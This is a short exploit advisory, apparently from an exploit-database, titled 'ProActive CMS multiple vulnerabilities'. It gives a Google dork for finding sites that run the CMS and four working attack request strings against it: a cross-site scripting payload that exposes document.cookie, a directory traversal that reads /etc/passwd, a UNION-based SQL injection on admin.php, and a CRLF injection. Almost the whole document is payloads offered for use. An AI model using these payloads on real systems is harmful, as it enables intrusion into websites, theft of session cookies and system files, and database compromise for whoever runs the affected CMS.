Kod:
#########################################################
# Exploit Title: ProActive CMS multiple vulnerabilities #
# Google Dork: intext:"Powered by Proactive CMS" #
# Date: 12.01.2013 #
# Vendor Homepage: ProActive CMS #
# Tested on: Linux #
#########################################################
---------------------
Cross site scripting |
---------------------
index.php?action=search&q=1</title>1<script >alert(document.cookie)</script>
--------------------
Directory traversal |
--------------------
/lavate/cute.old/Dialogs/Tag.Frame.php?setting=&Style=../../../../../../../../../../etc/passwd.jpg&Tab=Style&Tag=&Theme=&UC=
--------------
SQL injection |
--------------
admin.php?action=helpSWF&id=1/**/union/**/select/**/1,@@version,3,4/*
----------------
HTML spilitting |
----------------
/index.php?action=verifimage&code=%0d%0a%20Inject Your Own Code